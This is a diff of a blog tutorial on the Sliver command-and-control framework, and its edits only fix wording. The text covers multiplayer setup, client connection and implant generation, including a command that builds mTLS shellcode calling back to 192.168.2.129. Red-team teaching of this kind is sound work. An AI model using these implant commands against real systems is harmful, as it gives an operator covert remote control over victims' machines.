eversinc33/eversinc33.github.io/content/posts/sliver.md

 multiplayer
 ```

-If you have connection errors with the Sliver-client, it is likely that you forgot to run the above command, as it needs to be run every time you start the server.

 To connect to the server as an operator, run `sliver-client` and select your configuration file, if there are multiple.

+If you have connection errors with the Sliver-client, it is likely that you forgot to run the above `multiplayer` command, as it needs to be run every time the server is started.

 ### Generating Implants

 There are many options for generating implants and I recommend to read through them all with `help generate`.
 Note that by default a `session`-implant is generated, which communicates in a real time fashion.
 To generate a `beacon` implant, that periodically checks back for tasks, use `generate beacon`.
 Staged implants can be generated with `generate stager`.
 All your implants can be listed with `implants` and regenerated with `regenerate IMPLANT_NAME`.

-I generated the shellcode for an mTLS-based implant here.
+I generate the shellcode for an mTLS-based implant here.
 Compilation may take some time.

 ```bash
 generate -N IMPLANT_NAME --mtls 192.168.2.129 -f shellcode -s /tmp/sliver.bin
 ```

-Besides `shellcode`, you can also generate an `exe`, a dynamic library (`shared`) or a `service`to use for `psexec`.
+Besides `shellcode`, you can also generate an `exe`, a dynamic library (`shared`) or a `service` to use for `psexec`.

 Don't forget to start the listener with, in this case, `mtls`.